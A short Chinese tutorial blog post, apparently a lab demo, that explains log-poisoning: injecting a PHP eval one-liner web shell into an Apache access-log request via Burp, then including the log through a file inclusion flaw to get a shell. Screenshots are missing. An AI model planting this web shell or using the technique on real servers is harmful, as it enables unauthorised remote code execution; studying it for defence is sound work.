文件包含之日志getshell

iis,apache等中间件都会用一个日志文件用来记录一些信息,例如在某个时间段用户访问的url路劲和状态码,如果这个时候将访问的url改为一句话代码就会记录到日志中,在配合文件包含漏洞是可以直接getshell的,当然这个只在windows下有效
在linux日志路劲/var/log/apache2/access.log,需要root用户才能读取正常情况不能包含这里为了方便演示直接加权限

直接用bp抓包并在URL加上<?php phpinfo();@eval($_POST['moonsec']);?>
在这里插入图片描述

查看/varl/og/apache2/access.log,可以看到成功写入
在这里插入图片描述

尝试包含日志失败,权限不够应该只有root组和root用户才能访问,直接复制一个文件到网站根目录包含成功

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值